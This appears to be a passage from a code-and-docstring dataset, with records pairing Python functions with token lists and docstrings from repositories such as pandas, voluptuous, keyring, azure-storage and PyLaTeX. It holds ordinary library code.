param, value in reaction.parameters: parameters.add(param) parameter_values[param] = value reactants = reaction.reactants products = reaction.products propensities.append(reaction.propensity) for species_index, species_id in enumerate(species): net_stoichiometry = products.get(species_id, 0) - reactants.get(species_id, 0) stoichiometry_matrix[species_index, reaction_index] = net_stoichiometry if track_local_parameters: # sympy does not allow sorting its parameter lists by default, # explicitly tell to sort by str representation sorted_parameters = sorted(parameters, key=str) else: sorted_parameters = parameters parameter_values_list = [parameter_values[p] for p in sorted_parameters] # We need to concatenate compartment names and parameters as in our framework we cannot differentiate the two compartments_and_parameters = compartments + sorted_parameters parameter_values_list = compartment_sizes + parameter_values_list model = Model(species, compartments_and_parameters, propensities, stoichiometry_matrix) return model, parameter_values_list, initial_conditions
[ "def", "read_sbml", "(", "filename", ")", ":", "import", "libsbml", "if", "not", "os", ".", "path", ".", "exists", "(", "filename", ")", ":", "raise", "IOError", "(", "'File {0!r} does not exist'", ".", "format", "(", "filename", ")", ")", "reader", "=", "libsbml", ".", "SBMLReader", "(", ")", "document", "=", "reader", ".", "readSBML", "(", "filename", ")", "sbml_model", "=", "document", ".", "getModel", "(", ")", "if", "not", "sbml_model", ":", "raise", "ValueError", "(", "'Cannot parse SBML model from {0!r}'", ".", "format", "(", "filename", ")", ")", "species", "=", "sympy", ".", "symbols", "(", "[", "s", ".", "getId", "(", ")", "for", "s", "in", "sbml_model", ".", "getListOfSpecies", "(", ")", "]", ")", "initial_conditions", "=", "[", "s", ".", "getInitialConcentration", "(", ")", "for", "s", "in", "sbml_model", ".", "getListOfSpecies", "(", ")", "]", "compartments", "=", "sympy", ".", "symbols", "(", "[", "s", ".", "getId", "(", ")", "for", "s", "in", "sbml_model", ".", "getListOfCompartments", "(", ")", "]", ")", "compartment_sizes", "=", "[", "s", ".", "getSize", "(", ")", "for", "s", "in", "sbml_model", ".", "getListOfCompartments", "(", ")", "]", "reactions", "=", "map", "(", "_parse_reaction", ",", "sbml_model", ".", "getListOfReactions", "(", ")", ")", "# getListOfParameters is an attribute of the model for SBML Level 1&2", "parameters_with_values", "=", "[", "(", "sympy", ".", "Symbol", "(", "p", ".", "getId", "(", ")", ")", ",", "p", ".", "getValue", "(", ")", ")", "for", "p", "in", "sbml_model", ".", "getListOfParameters", "(", ")", "]", "parameter_values", "=", "dict", "(", "parameters_with_values", ")", "parameters", "=", "map", "(", "lambda", "x", ":", "x", "[", "0", "]", ",", "parameters_with_values", ")", "if", "not", "parameters", ":", "track_local_parameters", "=", "True", "parameters", "=", "set", "(", ")", "parameter_values", "=", "{", "}", "else", ":", "track_local_parameters", "=", "False", "stoichiometry_matrix", "=", "np", ".", "zeros", "(", "(", "len", "(", "species", ")", ",", "len", "(", "reactions", ")", ")", ",", "dtype", "=", "int", ")", "propensities", "=", "[", "]", "for", "reaction_index", ",", "reaction", "in", "enumerate", "(", "reactions", ")", ":", "if", "track_local_parameters", ":", "for", "param", ",", "value", "in", "reaction", ".", "parameters", ":", "parameters", ".", "add", "(", "param", ")", "parameter_values", "[", "param", "]", "=", "value", "reactants", "=", "reaction", ".", "reactants", "products", "=", "reaction", ".", "products", "propensities", ".", "append", "(", "reaction", ".", "propensity", ")", "for", "species_index", ",", "species_id", "in", "enumerate", "(", "species", ")", ":", "net_stoichiometry", "=", "products", ".", "get", "(", "species_id", ",", "0", ")", "-", "reactants", ".", "get", "(", "species_id", ",", "0", ")", "stoichiometry_matrix", "[", "species_index", ",", "reaction_index", "]", "=", "net_stoichiometry", "if", "track_local_parameters", ":", "# sympy does not allow sorting its parameter lists by default,", "# explicitly tell to sort by str representation", "sorted_parameters", "=", "sorted", "(", "parameters", ",", "key", "=", "str", ")", "else", ":", "sorted_parameters", "=", "parameters", "parameter_values_list", "=", "[", "parameter_values", "[", "p", "]", "for", "p", "in", "sorted_parameters", "]", "# We need to concatenate compartment names and parameters as in our framework we cannot differentiate the two", "compartments_and_parameters", "=", "compartments", "+", "sorted_parameters", 
"parameter_values_list", "=", "compartment_sizes", "+", "parameter_values_list", "model", "=", "Model", "(", "species", ",", "compartments_and_parameters", ",", "propensities", ",", "stoichiometry_matrix", ")", "return", "model", ",", "parameter_values_list", ",", "initial_conditions" ]
Read the model from a SBML file. :param filename: SBML filename to read the model from :return: A tuple, consisting of a :class:`~means.core.model.Model` instance, a list of parameter values, and a list of initial conditions.
[ "Read", "the", "model", "from", "a", "SBML", "file", "." ]
python
train
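A usage sketch for the reader above; the filename is illustrative, and the comments only restate the ordering the function itself establishes (compartment sizes first, then sorted parameters).
# Usage sketch for read_sbml() above; 'model.xml' is an illustrative path.
from means.io.sbml import read_sbml

model, parameter_values, initial_conditions = read_sbml('model.xml')
# parameter_values holds compartment sizes first, then the sorted
# parameters, matching the model's compartments-plus-parameters list;
# initial_conditions has one entry per species.
print(parameter_values)
print(initial_conditions)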
pszafer/epson_projector
epson_projector/main.py
https://github.com/pszafer/epson_projector/blob/b8a10ace56e0a5cf858546041819c0e7ebca208f/epson_projector/main.py#L52-L56
def __initLock(self): """Init lock for sending request to projector when it is busy.""" self._isLocked = False self._timer = 0 self._operation = False
[ "def", "__initLock", "(", "self", ")", ":", "self", ".", "_isLocked", "=", "False", "self", ".", "_timer", "=", "0", "self", ".", "_operation", "=", "False" ]
Init lock for sending request to projector when it is busy.
[ "Init", "lock", "for", "sending", "request", "to", "projector", "when", "it", "is", "busy", "." ]
python
train
DLR-RM/RAFCON
source/rafcon/gui/mygaphas/items/line.py
https://github.com/DLR-RM/RAFCON/blob/24942ef1a904531f49ab8830a1dbb604441be498/source/rafcon/gui/mygaphas/items/line.py#L309-L316
def _head_length(self, port): """Distance from the center of the port to the perpendicular waypoint""" if not port: return 0. parent_state_v = self.get_parent_state_v() if parent_state_v is port.parent: # port of connection's parent state return port.port_size[1] return max(port.port_size[1] * 1.5, self._calc_line_width() / 1.3)
[ "def", "_head_length", "(", "self", ",", "port", ")", ":", "if", "not", "port", ":", "return", "0.", "parent_state_v", "=", "self", ".", "get_parent_state_v", "(", ")", "if", "parent_state_v", "is", "port", ".", "parent", ":", "# port of connection's parent state", "return", "port", ".", "port_size", "[", "1", "]", "return", "max", "(", "port", ".", "port_size", "[", "1", "]", "*", "1.5", ",", "self", ".", "_calc_line_width", "(", ")", "/", "1.3", ")" ]
Distance from the center of the port to the perpendicular waypoint
[ "Distance", "from", "the", "center", "of", "the", "port", "to", "the", "perpendicular", "waypoint" ]
python
train
JonathanRaiman/ciseau
ciseau/word_tokenizer.py
https://github.com/JonathanRaiman/ciseau/blob/f72d1c82d85eeb3d3ac9fac17690041725402175/ciseau/word_tokenizer.py#L185-L260
def tokenize(text, normalize_ascii=True): """ Convert a single string into a list of substrings split along punctuation and word boundaries. Keep whitespace intact by always attaching it to the previous token. Arguments: ---------- text : str normalize_ascii : bool, perform some replacements on non-ascii characters to canonicalize the string (defaults to True). Returns: -------- list<str>, list of substring tokens. """ # 1. If there's no punctuation, return immediately if no_punctuation.match(text): return [text] # 2. let's standardize the input text to ascii (if desired) # Note: this will no longer respect input-to-output character positions if normalize_ascii: # normalize these greco-roman characters to ascii: text = text.replace(u"œ", "oe").replace(u"æ", "ae") # normalize dashes: text = repeated_dash_converter.sub("-", text) # 3. let's construct an integer array of the possible split locations: split_locations = [UNDECIDED] * len(text) regexes = ( pure_whitespace, left_quote_shifter, left_quote_converter, left_single_quote_converter, remaining_quote_converter, # regex can't fix this -> regex ca n't fix this english_nots, # you'll dig this -> you 'll dig this english_contractions, # the rhino's horns -> the rhino 's horns english_specific_appendages, # qu'a tu fais au rhino -> qu ' a tu fais au rhino, french_appendages ) # 4. Mark end locations for specific regular expressions: for regex in regexes: mark_regex(regex, text, split_locations) begin_end_regexes = ( multi_single_quote_finder, right_single_quote_converter, # use dashes as the breakpoint: # the rhino--truck -> the rhino -- truck simple_dash_finder if normalize_ascii else advanced_dash_finder, numerical_expression, url_file_finder, shifted_ellipses, # the #rhino! -> the # rhino ! ; # the rino[sic] -> the rino [ sic ] shifted_standard_punctuation ) # 5. Mark begin and end locations for other regular expressions: for regex in begin_end_regexes: mark_begin_end_regex(regex, text, split_locations) # 6. Remove splitting on exceptional uses of periods: # I'm with Mr. -> I 'm with Mr. , I'm with Mister. -> I 'm with Mister . protect_shorthand(text, split_locations) if normalize_ascii: text = dash_converter.sub("-", text) # 7. Return the split string using the integer list: return list(split_with_locations(text, split_locations))
[ "def", "tokenize", "(", "text", ",", "normalize_ascii", "=", "True", ")", ":", "# 1. If there's no punctuation, return immediately", "if", "no_punctuation", ".", "match", "(", "text", ")", ":", "return", "[", "text", "]", "# 2. let's standardize the input text to ascii (if desired)", "# Note: this will no longer respect input-to-output character positions", "if", "normalize_ascii", ":", "# normalize these greco-roman characters to ascii:", "text", "=", "text", ".", "replace", "(", "u\"œ\",", " ", "oe\")", ".", "r", "eplace(", "u", "\"æ\", ", "\"", "e\")", "", "# normalize dashes:", "text", "=", "repeated_dash_converter", ".", "sub", "(", "\"-\"", ",", "text", ")", "# 3. let's construct an integer array of the possible split locations:", "split_locations", "=", "[", "UNDECIDED", "]", "*", "len", "(", "text", ")", "regexes", "=", "(", "pure_whitespace", ",", "left_quote_shifter", ",", "left_quote_converter", ",", "left_single_quote_converter", ",", "remaining_quote_converter", ",", "# regex can't fix this -> regex ca n't fix this", "english_nots", ",", "# you'll dig this -> you 'll dig this", "english_contractions", ",", "# the rhino's horns -> the rhino 's horns", "english_specific_appendages", ",", "# qu'a tu fais au rhino -> qu ' a tu fais au rhino,", "french_appendages", ")", "# 4. Mark end locations for specific regular expressions:", "for", "regex", "in", "regexes", ":", "mark_regex", "(", "regex", ",", "text", ",", "split_locations", ")", "begin_end_regexes", "=", "(", "multi_single_quote_finder", ",", "right_single_quote_converter", ",", "# use dashes as the breakpoint:", "# the rhino--truck -> the rhino -- truck", "simple_dash_finder", "if", "normalize_ascii", "else", "advanced_dash_finder", ",", "numerical_expression", ",", "url_file_finder", ",", "shifted_ellipses", ",", "# the #rhino! -> the # rhino ! ;", "# the rino[sic] -> the rino [ sic ]", "shifted_standard_punctuation", ")", "# 5. Mark begin and end locations for other regular expressions:", "for", "regex", "in", "begin_end_regexes", ":", "mark_begin_end_regex", "(", "regex", ",", "text", ",", "split_locations", ")", "# 6. Remove splitting on exceptional uses of periods:", "# I'm with Mr. -> I 'm with Mr. , I'm with Mister. -> I 'm with Mister .", "protect_shorthand", "(", "text", ",", "split_locations", ")", "if", "normalize_ascii", ":", "text", "=", "dash_converter", ".", "sub", "(", "\"-\"", ",", "text", ")", "# 7. Return the split string using the integer list:", "return", "list", "(", "split_with_locations", "(", "text", ",", "split_locations", ")", ")" ]
Convert a single string into a list of substrings split along punctuation and word boundaries. Keep whitespace intact by always attaching it to the previous token. Arguments: ---------- text : str normalize_ascii : bool, perform some replacements on non-ascii characters to canonicalize the string (defaults to True). Returns: -------- list<str>, list of substring tokens.
[ "Convert", "a", "single", "string", "into", "a", "list", "of", "substrings", "split", "along", "punctuation", "and", "word", "boundaries", ".", "Keep", "whitespace", "intact", "by", "always", "attaching", "it", "to", "the", "previous", "token", "." ]
python
test
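A quick sketch of the whitespace-preserving behaviour; the output shown is what the rules above predict ("can't" split by english_nots, "--" isolated by the dash finder), so treat it as expected rather than verified.
# Usage sketch for tokenize() above. Whitespace stays attached to the
# preceding token, so ''.join(tokens) reconstructs the input.
from ciseau import tokenize

tokens = tokenize("I can't fix this -- really!")
print(tokens)
# expected, per the rules above:
# ['I ', 'ca', "n't ", 'fix ', 'this ', '-- ', 'really', '!']
assert ''.join(tokens) == "I can't fix this -- really!"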
Azure/azure-storage-python
azure-storage-queue/azure/storage/queue/queueservice.py
https://github.com/Azure/azure-storage-python/blob/52327354b192cbcf6b7905118ec6b5d57fa46275/azure-storage-queue/azure/storage/queue/queueservice.py#L414-L450
def list_queues(self, prefix=None, num_results=None, include_metadata=False, marker=None, timeout=None): ''' Returns a generator to list the queues. The generator will lazily follow the continuation tokens returned by the service and stop when all queues have been returned or num_results is reached. If num_results is specified and the account has more than that number of queues, the generator will have a populated next_marker field once it finishes. This marker can be used to create a new generator if more results are desired. :param str prefix: Filters the results to return only queues with names that begin with the specified prefix. :param int num_results: The maximum number of queues to return. :param bool include_metadata: Specifies that container metadata be returned in the response. :param str marker: An opaque continuation token. This value can be retrieved from the next_marker field of a previous generator object if num_results was specified and that generator has finished enumerating results. If specified, this generator will begin returning results from the point where the previous generator stopped. :param int timeout: The server timeout, expressed in seconds. This function may make multiple calls to the service in which case the timeout value specified will be applied to each individual call. ''' include = 'metadata' if include_metadata else None operation_context = _OperationContext(location_lock=True) kwargs = {'prefix': prefix, 'max_results': num_results, 'include': include, 'marker': marker, 'timeout': timeout, '_context': operation_context} resp = self._list_queues(**kwargs) return ListGenerator(resp, self._list_queues, (), kwargs)
[ "def", "list_queues", "(", "self", ",", "prefix", "=", "None", ",", "num_results", "=", "None", ",", "include_metadata", "=", "False", ",", "marker", "=", "None", ",", "timeout", "=", "None", ")", ":", "include", "=", "'metadata'", "if", "include_metadata", "else", "None", "operation_context", "=", "_OperationContext", "(", "location_lock", "=", "True", ")", "kwargs", "=", "{", "'prefix'", ":", "prefix", ",", "'max_results'", ":", "num_results", ",", "'include'", ":", "include", ",", "'marker'", ":", "marker", ",", "'timeout'", ":", "timeout", ",", "'_context'", ":", "operation_context", "}", "resp", "=", "self", ".", "_list_queues", "(", "*", "*", "kwargs", ")", "return", "ListGenerator", "(", "resp", ",", "self", ".", "_list_queues", ",", "(", ")", ",", "kwargs", ")" ]
Returns a generator to list the queues. The generator will lazily follow the continuation tokens returned by the service and stop when all queues have been returned or num_results is reached. If num_results is specified and the account has more than that number of queues, the generator will have a populated next_marker field once it finishes. This marker can be used to create a new generator if more results are desired. :param str prefix: Filters the results to return only queues with names that begin with the specified prefix. :param int num_results: The maximum number of queues to return. :param bool include_metadata: Specifies that container metadata be returned in the response. :param str marker: An opaque continuation token. This value can be retrieved from the next_marker field of a previous generator object if num_results was specified and that generator has finished enumerating results. If specified, this generator will begin returning results from the point where the previous generator stopped. :param int timeout: The server timeout, expressed in seconds. This function may make multiple calls to the service in which case the timeout value specified will be applied to each individual call.
[ "Returns", "a", "generator", "to", "list", "the", "queues", ".", "The", "generator", "will", "lazily", "follow", "the", "continuation", "tokens", "returned", "by", "the", "service", "and", "stop", "when", "all", "queues", "have", "been", "returned", "or", "num_results", "is", "reached", "." ]
python
train
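Typical caller-side usage of the generator above; the account credentials and prefix are placeholders. The generator transparently follows continuation tokens until all queues (or num_results) have been yielded.
# Usage sketch for list_queues() above; account name/key and the prefix
# are placeholders. The generator follows continuation tokens lazily.
from azure.storage.queue import QueueService

queue_service = QueueService(account_name='myaccount', account_key='...')
for queue in queue_service.list_queues(prefix='task', num_results=50):
    print(queue.name)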
sorgerlab/indra
indra/sources/tees/processor.py
https://github.com/sorgerlab/indra/blob/79a70415832c5702d7a820c7c9ccc8e25010124b/indra/sources/tees/processor.py#L188-L199
def get_related_node(self, node, relation): """Looks for an edge from node to some other node, such that the edge is annotated with the given relation. If there exists such an edge, returns the name of the node it points to. Otherwise, returns None.""" G = self.G for edge in G.edges(node): to = edge[1] to_relation = G.edges[node, to]['relation'] if to_relation == relation: return to return None
[ "def", "get_related_node", "(", "self", ",", "node", ",", "relation", ")", ":", "G", "=", "self", ".", "G", "for", "edge", "in", "G", ".", "edges", "(", "node", ")", ":", "to", "=", "edge", "[", "1", "]", "to_relation", "=", "G", ".", "edges", "[", "node", ",", "to", "]", "[", "'relation'", "]", "if", "to_relation", "==", "relation", ":", "return", "to", "return", "None" ]
Looks for an edge from node to some other node, such that the edge is annotated with the given relation. If there exists such an edge, returns the name of the node it points to. Otherwise, returns None.
[ "Looks", "for", "an", "edge", "from", "node", "to", "some", "other", "node", "such", "that", "the", "edge", "is", "annotated", "with", "the", "given", "relation", ".", "If", "there", "exists", "such", "an", "edge", "returns", "the", "name", "of", "the", "node", "it", "points", "to", ".", "Otherwise", "returns", "None", "." ]
python
train
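The lookup only relies on networkx edge attributes, so it can be exercised with a toy graph; the node and relation names below are illustrative, not real TEES output.
# Self-contained mimic of the lookup above on a toy networkx graph.
import networkx as nx

G = nx.DiGraph()
G.add_edge('E1', 'T2', relation='theme')
G.add_edge('E1', 'T3', relation='cause')

def get_related_node(G, node, relation):
    # same traversal as the method above, with the graph passed explicitly
    for edge in G.edges(node):
        to = edge[1]
        if G.edges[node, to]['relation'] == relation:
            return to
    return None

print(get_related_node(G, 'E1', 'cause'))   # T3
print(get_related_node(G, 'E1', 'agent'))   # None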
rigetti/quantumflow
quantumflow/visualization.py
https://github.com/rigetti/quantumflow/blob/13a66cabbe8aabf6e023cc675f4a4ebe6ccda8fb/quantumflow/visualization.py#L308-L327
def circuit_to_image(circ: Circuit, qubits: Qubits = None) -> PIL.Image:  # pragma: no cover
    """Create an image of a quantum circuit.

    A convenience function that calls circuit_to_latex() and render_latex().

    Args:
        circ:       A quantum Circuit
        qubits:     Optional qubit list to specify qubit order

    Returns:
        A PIL Image (Use img.show() to display)

    Raises:
        NotImplementedError: For unsupported gates.
        OSError: If an external dependency is not installed.
    """
    latex = circuit_to_latex(circ, qubits)
    img = render_latex(latex)
    return img
[ "def", "circuit_to_image", "(", "circ", ":", "Circuit", ",", "qubits", ":", "Qubits", "=", "None", ")", "->", "PIL", ".", "Image", ":", "# pragma: no cover", "latex", "=", "circuit_to_latex", "(", "circ", ",", "qubits", ")", "img", "=", "render_latex", "(", "latex", ")", "return", "img" ]
Create an image of a quantum circuit. A convenience function that calls circuit_to_latex() and render_latex(). Args: circ: A quantum Circuit qubits: Optional qubit list to specify qubit order Returns: A PIL Image (Use img.show() to display) Raises: NotImplementedError: For unsupported gates. OSError: If an external dependency is not installed.
[ "Create", "an", "image", "of", "a", "quantum", "circuit", "." ]
python
train
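A usage sketch; it requires the external LaTeX toolchain mentioned in the Raises section, and the gate constructors below are assumed from quantumflow's conventions rather than taken from this record.
# Hypothetical usage; requires a working LaTeX toolchain (OSError otherwise).
# The Bell-pair circuit and gate names are illustrative assumptions.
import quantumflow as qf
from quantumflow.visualization import circuit_to_image

circ = qf.Circuit([qf.H(0), qf.CNOT(0, 1)])
img = circuit_to_image(circ)
img.show()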
Robpol86/flake8-pydocstyle
flake8_pydocstyle.py
https://github.com/Robpol86/flake8-pydocstyle/blob/657425541e1d868a6a5241a83c3a16a9a715d6b5/flake8_pydocstyle.py#L20-L43
def load_file(filename): """Read file to memory. For stdin sourced files, this function does something super duper incredibly hacky and shameful. So so shameful. I'm obtaining the original source code of the target module from the only instance of pycodestyle.Checker through the Python garbage collector. Flake8's API doesn't give me the original source code of the module we are checking. Instead it has pycodestyle give me an AST object of the module (already parsed). This unfortunately loses valuable information like the kind of quotes used for strings (no way to know if a docstring was surrounded by triple double quotes or just one single quote, thereby rendering pydocstyle's D300 error as unusable). This will break one day. I'm sure of it. For now it fixes https://github.com/Robpol86/flake8-pydocstyle/issues/2 :param str filename: File path or 'stdin'. From Main().filename. :return: First item is the filename or 'stdin', second are the contents of the file. :rtype: tuple """ if filename in ('stdin', '-', None): instances = [i for i in gc.get_objects() if isinstance(i, pycodestyle.Checker) or isinstance(i, pep8.Checker)] if len(instances) != 1: raise ValueError('Expected only 1 instance of pycodestyle.Checker, got {0} instead.'.format(len(instances))) return 'stdin', ''.join(instances[0].lines) with codecs.open(filename, encoding='utf-8') as handle: return filename, handle.read()
[ "def", "load_file", "(", "filename", ")", ":", "if", "filename", "in", "(", "'stdin'", ",", "'-'", ",", "None", ")", ":", "instances", "=", "[", "i", "for", "i", "in", "gc", ".", "get_objects", "(", ")", "if", "isinstance", "(", "i", ",", "pycodestyle", ".", "Checker", ")", "or", "isinstance", "(", "i", ",", "pep8", ".", "Checker", ")", "]", "if", "len", "(", "instances", ")", "!=", "1", ":", "raise", "ValueError", "(", "'Expected only 1 instance of pycodestyle.Checker, got {0} instead.'", ".", "format", "(", "len", "(", "instances", ")", ")", ")", "return", "'stdin'", ",", "''", ".", "join", "(", "instances", "[", "0", "]", ".", "lines", ")", "with", "codecs", ".", "open", "(", "filename", ",", "encoding", "=", "'utf-8'", ")", "as", "handle", ":", "return", "filename", ",", "handle", ".", "read", "(", ")" ]
Read file to memory. For stdin sourced files, this function does something super duper incredibly hacky and shameful. So so shameful. I'm obtaining the original source code of the target module from the only instance of pycodestyle.Checker through the Python garbage collector. Flake8's API doesn't give me the original source code of the module we are checking. Instead it has pycodestyle give me an AST object of the module (already parsed). This unfortunately loses valuable information like the kind of quotes used for strings (no way to know if a docstring was surrounded by triple double quotes or just one single quote, thereby rendering pydocstyle's D300 error as unusable). This will break one day. I'm sure of it. For now it fixes https://github.com/Robpol86/flake8-pydocstyle/issues/2 :param str filename: File path or 'stdin'. From Main().filename. :return: First item is the filename or 'stdin', second are the contents of the file. :rtype: tuple
[ "Read", "file", "to", "memory", "." ]
python
train
JelteF/PyLaTeX
pylatex/tikz.py
https://github.com/JelteF/PyLaTeX/blob/62d9d9912ce8445e6629cdbcb80ad86143a1ed23/pylatex/tikz.py#L230-L247
def dumps(self): """Return string representation of the node.""" ret_str = [] ret_str.append(Command('node', options=self.options).dumps()) if self.handle is not None: ret_str.append('({})'.format(self.handle)) if self._node_position is not None: ret_str.append('at {}'.format(str(self._position))) if self._node_text is not None: ret_str.append('{{{text}}};'.format(text=self._node_text)) else: ret_str.append('{};') return ' '.join(ret_str)
[ "def", "dumps", "(", "self", ")", ":", "ret_str", "=", "[", "]", "ret_str", ".", "append", "(", "Command", "(", "'node'", ",", "options", "=", "self", ".", "options", ")", ".", "dumps", "(", ")", ")", "if", "self", ".", "handle", "is", "not", "None", ":", "ret_str", ".", "append", "(", "'({})'", ".", "format", "(", "self", ".", "handle", ")", ")", "if", "self", ".", "_node_position", "is", "not", "None", ":", "ret_str", ".", "append", "(", "'at {}'", ".", "format", "(", "str", "(", "self", ".", "_position", ")", ")", ")", "if", "self", ".", "_node_text", "is", "not", "None", ":", "ret_str", ".", "append", "(", "'{{{text}}};'", ".", "format", "(", "text", "=", "self", ".", "_node_text", ")", ")", "else", ":", "ret_str", ".", "append", "(", "'{};'", ")", "return", "' '", ".", "join", "(", "ret_str", ")" ]
Return string representation of the node.
[ "Return", "string", "representation", "of", "the", "node", "." ]
python
train
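A sketch of building a node and dumping it; the constructor keywords are assumed from the attributes the method reads (handle, position, text, options), and the printed output is the expected join of the parts shown above.
# Usage sketch for TikZNode.dumps() above; constructor keywords are
# assumed from the attributes the method reads.
from pylatex import TikZNode, TikZCoordinate, TikZOptions

node = TikZNode(handle='origin',
                at=TikZCoordinate(0, 0),
                text='demo',
                options=TikZOptions('draw'))
print(node.dumps())
# expected, roughly: \node[draw] (origin) at (0.0,0.0) {demo};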
pandas-dev/pandas
pandas/plotting/_core.py
https://github.com/pandas-dev/pandas/blob/9feb3ad92cc0397a04b665803a49299ee7aa1037/pandas/plotting/_core.py#L3248-L3293
def hist(self, by=None, bins=10, **kwds): """ Draw one histogram of the DataFrame's columns. A histogram is a representation of the distribution of data. This function groups the values of all given Series in the DataFrame into bins and draws all bins in one :class:`matplotlib.axes.Axes`. This is useful when the DataFrame's Series are in a similar scale. Parameters ---------- by : str or sequence, optional Column in the DataFrame to group by. bins : int, default 10 Number of histogram bins to be used. **kwds Additional keyword arguments are documented in :meth:`DataFrame.plot`. Returns ------- class:`matplotlib.AxesSubplot` Return a histogram plot. See Also -------- DataFrame.hist : Draw histograms per DataFrame's Series. Series.hist : Draw a histogram with Series' data. Examples -------- When we draw a dice 6000 times, we expect to get each value around 1000 times. But when we draw two dices and sum the result, the distribution is going to be quite different. A histogram illustrates those distributions. .. plot:: :context: close-figs >>> df = pd.DataFrame( ... np.random.randint(1, 7, 6000), ... columns = ['one']) >>> df['two'] = df['one'] + np.random.randint(1, 7, 6000) >>> ax = df.plot.hist(bins=12, alpha=0.5) """ return self(kind='hist', by=by, bins=bins, **kwds)
[ "def", "hist", "(", "self", ",", "by", "=", "None", ",", "bins", "=", "10", ",", "*", "*", "kwds", ")", ":", "return", "self", "(", "kind", "=", "'hist'", ",", "by", "=", "by", ",", "bins", "=", "bins", ",", "*", "*", "kwds", ")" ]
Draw one histogram of the DataFrame's columns. A histogram is a representation of the distribution of data. This function groups the values of all given Series in the DataFrame into bins and draws all bins in one :class:`matplotlib.axes.Axes`. This is useful when the DataFrame's Series are in a similar scale. Parameters ---------- by : str or sequence, optional Column in the DataFrame to group by. bins : int, default 10 Number of histogram bins to be used. **kwds Additional keyword arguments are documented in :meth:`DataFrame.plot`. Returns ------- :class:`matplotlib.AxesSubplot` Return a histogram plot. See Also -------- DataFrame.hist : Draw histograms per DataFrame's Series. Series.hist : Draw a histogram with Series' data. Examples -------- When we roll a die 6000 times, we expect each value to come up around 1000 times. But when we roll two dice and sum the result, the distribution is going to be quite different. A histogram illustrates those distributions. .. plot:: :context: close-figs >>> df = pd.DataFrame( ... np.random.randint(1, 7, 6000), ... columns = ['one']) >>> df['two'] = df['one'] + np.random.randint(1, 7, 6000) >>> ax = df.plot.hist(bins=12, alpha=0.5)
[ "Draw", "one", "histogram", "of", "the", "DataFrame", "s", "columns", "." ]
python
train
jaraco/keyring
keyring/backends/SecretService.py
https://github.com/jaraco/keyring/blob/71c798378e365286b7cc03c06e4d7d24c7de8fc4/keyring/backends/SecretService.py#L61-L72
def get_password(self, service, username): """Get password of the username for the service """ collection = self.get_preferred_collection() items = collection.search_items( {"username": username, "service": service}) for item in items: if hasattr(item, 'unlock'): item.unlock() if item.is_locked(): # User dismissed the prompt raise KeyringLocked('Failed to unlock the item!') return item.get_secret().decode('utf-8')
[ "def", "get_password", "(", "self", ",", "service", ",", "username", ")", ":", "collection", "=", "self", ".", "get_preferred_collection", "(", ")", "items", "=", "collection", ".", "search_items", "(", "{", "\"username\"", ":", "username", ",", "\"service\"", ":", "service", "}", ")", "for", "item", "in", "items", ":", "if", "hasattr", "(", "item", ",", "'unlock'", ")", ":", "item", ".", "unlock", "(", ")", "if", "item", ".", "is_locked", "(", ")", ":", "# User dismissed the prompt", "raise", "KeyringLocked", "(", "'Failed to unlock the item!'", ")", "return", "item", ".", "get_secret", "(", ")", ".", "decode", "(", "'utf-8'", ")" ]
Get password of the username for the service
[ "Get", "password", "of", "the", "username", "for", "the", "service" ]
python
valid
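Callers normally go through keyring's top-level API rather than the backend method directly; the service and user names below are placeholders, and a usable system keyring backend is assumed.
# Usage sketch; service and user names are placeholders, and a working
# keyring backend is assumed. The top-level API dispatches to the
# configured backend's get_password() shown above.
import keyring

keyring.set_password('my-service', 'alice', 's3cret')
print(keyring.get_password('my-service', 'alice'))   # 's3cret'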
alecthomas/voluptuous
voluptuous/schema_builder.py
https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L598-L653
def _compile_sequence(self, schema, seq_type): """Validate a sequence type. This is a sequence of valid values or validators tried in order. >>> validator = Schema(['one', 'two', int]) >>> validator(['one']) ['one'] >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'): ... validator([3.5]) >>> validator([1]) [1] """ _compiled = [self._compile(s) for s in schema] seq_type_name = seq_type.__name__ def validate_sequence(path, data): if not isinstance(data, seq_type): raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path) # Empty seq schema, allow any data. if not schema: if data: raise er.MultipleInvalid([ er.ValueInvalid('not a valid value', [value]) for value in data ]) return data out = [] invalid = None errors = [] index_path = UNDEFINED for i, value in enumerate(data): index_path = path + [i] invalid = None for validate in _compiled: try: cval = validate(index_path, value) if cval is not Remove: # do not include Remove values out.append(cval) break except er.Invalid as e: if len(e.path) > len(index_path): raise invalid = e else: errors.append(invalid) if errors: raise er.MultipleInvalid(errors) if _isnamedtuple(data): return type(data)(*out) else: return type(data)(out) return validate_sequence
[ "def", "_compile_sequence", "(", "self", ",", "schema", ",", "seq_type", ")", ":", "_compiled", "=", "[", "self", ".", "_compile", "(", "s", ")", "for", "s", "in", "schema", "]", "seq_type_name", "=", "seq_type", ".", "__name__", "def", "validate_sequence", "(", "path", ",", "data", ")", ":", "if", "not", "isinstance", "(", "data", ",", "seq_type", ")", ":", "raise", "er", ".", "SequenceTypeInvalid", "(", "'expected a %s'", "%", "seq_type_name", ",", "path", ")", "# Empty seq schema, allow any data.", "if", "not", "schema", ":", "if", "data", ":", "raise", "er", ".", "MultipleInvalid", "(", "[", "er", ".", "ValueInvalid", "(", "'not a valid value'", ",", "[", "value", "]", ")", "for", "value", "in", "data", "]", ")", "return", "data", "out", "=", "[", "]", "invalid", "=", "None", "errors", "=", "[", "]", "index_path", "=", "UNDEFINED", "for", "i", ",", "value", "in", "enumerate", "(", "data", ")", ":", "index_path", "=", "path", "+", "[", "i", "]", "invalid", "=", "None", "for", "validate", "in", "_compiled", ":", "try", ":", "cval", "=", "validate", "(", "index_path", ",", "value", ")", "if", "cval", "is", "not", "Remove", ":", "# do not include Remove values", "out", ".", "append", "(", "cval", ")", "break", "except", "er", ".", "Invalid", "as", "e", ":", "if", "len", "(", "e", ".", "path", ")", ">", "len", "(", "index_path", ")", ":", "raise", "invalid", "=", "e", "else", ":", "errors", ".", "append", "(", "invalid", ")", "if", "errors", ":", "raise", "er", ".", "MultipleInvalid", "(", "errors", ")", "if", "_isnamedtuple", "(", "data", ")", ":", "return", "type", "(", "data", ")", "(", "*", "out", ")", "else", ":", "return", "type", "(", "data", ")", "(", "out", ")", "return", "validate_sequence" ]
Validate a sequence type. This is a sequence of valid values or validators tried in order. >>> validator = Schema(['one', 'two', int]) >>> validator(['one']) ['one'] >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'): ... validator([3.5]) >>> validator([1]) [1]
[ "Validate", "a", "sequence", "type", "." ]
python
train
saltstack/salt
